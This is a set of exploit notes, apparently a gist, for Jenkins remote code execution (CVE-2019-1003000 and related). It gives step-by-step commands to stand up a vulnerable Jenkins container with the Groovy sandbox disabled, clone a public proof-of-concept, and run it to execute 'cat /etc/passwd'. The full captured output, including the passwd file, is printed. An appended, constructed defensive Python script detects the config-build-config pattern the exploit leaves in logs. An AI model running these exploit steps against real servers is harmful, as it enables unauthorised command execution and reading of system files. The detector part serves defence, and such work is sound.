Last active
December 7, 2021 10:17
Exploit Notes: CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002
#Install vulnerable docker version of Jenkins
$ docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.121.2
- Go to http://127.0.0.1:8080
- Install suggested plugins
- Create a user account (admin|admin)
- Click "New Item"
- Under Item Name, enter 'Helloworld', choose 'Pipeline' and click 'OK'
- Under 'Pipeline', untick 'Use Groovy Sandbox' and click 'Save'
#Install Scripts to Exploit Vulnerability
$ git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git
$ cd cve-2019-1003000-jenkins-rce-poc
$ pip install -r requirements.txt
#Run Exploit and wait for results
$ python exploit.py --url http://127.0.0.1:8080 --job Helloworld --username admin --password admin --cmd "cat /etc/passwd"
[+] connecting to jenkins...
[+] crafting payload...
[+] modifying job with payload...
[+] putting job build to queue...
[+] waiting for job to build...
[+] restoring job...
[+] fetching output...
[+] OUTPUT:
Started by user admin
Running in Durability level: MAX_SURVIVABILITY
[Pipeline] Start of Pipeline
[Pipeline] echo
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash
[Pipeline] End of Pipeline
Finished: SUCCESS
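
A defender's view of the run above, as an added example that is not part of the original notes or of the PoC: the output shows the job being modified, built and then restored, so the same user writing a job's configuration, triggering a build and writing the configuration again within minutes is worth alerting on. The log format and sample lines are constructed; /job/<name>/config.xml and /job/<name>/build are Jenkins' standard REST paths, and that the PoC goes through them is an assumption.

```python
import re
from datetime import datetime, timedelta

# Constructed access-log lines; assumed format: time user "METHOD path" status
SAMPLE_LOG = """\
2024-01-01T10:15:01 admin "POST /job/Helloworld/config.xml" 200
2024-01-01T10:15:02 admin "POST /job/Helloworld/build" 201
2024-01-01T10:15:09 admin "POST /job/Helloworld/config.xml" 200
2024-01-01T10:20:00 alice "POST /job/Deploy/config.xml" 200
2024-01-01T11:45:00 alice "POST /job/Deploy/build" 201
2024-01-01T12:00:00 bob "GET /job/Deploy/config.xml" 200
"""

LINE = re.compile(r'^(\S+) (\S+) "(\w+) /job/([^/"\s]+)/(config\.xml|build)" (\d{3})$')

def parse(log):
    """Yield (time, user, job, action) for successful POSTs to config.xml or build."""
    for line in log.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        ts, user, method, job, endpoint, status = m.groups()
        if method == "POST" and status.startswith("2"):
            action = "config" if endpoint == "config.xml" else "build"
            yield datetime.fromisoformat(ts), user, job, action

def find_modify_build_restore(log, window=timedelta(minutes=5)):
    """Return (user, job, first_write, second_write) for config -> build -> config in window."""
    pending = {}  # (user, job) -> (stage, time of the first config write)
    hits = []
    for ts, user, job, action in sorted(parse(log)):
        key = (user, job)
        stage, start = pending.get(key, (0, ts))
        fresh = ts - start <= window
        if action == "config":
            if stage == 2 and fresh:          # write, build, write again: flag it
                hits.append((user, job, start, ts))
                pending.pop(key)
            else:                             # first write (or a stale sequence restarts)
                pending[key] = (1, ts)
        elif stage in (1, 2) and fresh:       # build after a recent config write
            pending[key] = (2, start)
        else:                                 # build with no recent write: not this pattern
            pending.pop(key, None)
    return hits

if __name__ == "__main__":
    for user, job, first, last in find_modify_build_restore(SAMPLE_LOG):
        print(f"ALERT {user} rewrote, built and rewrote job {job} between {first} and {last}")
```

An ordinary edit followed by a build does not match; only the second configuration write inside the window completes the pattern.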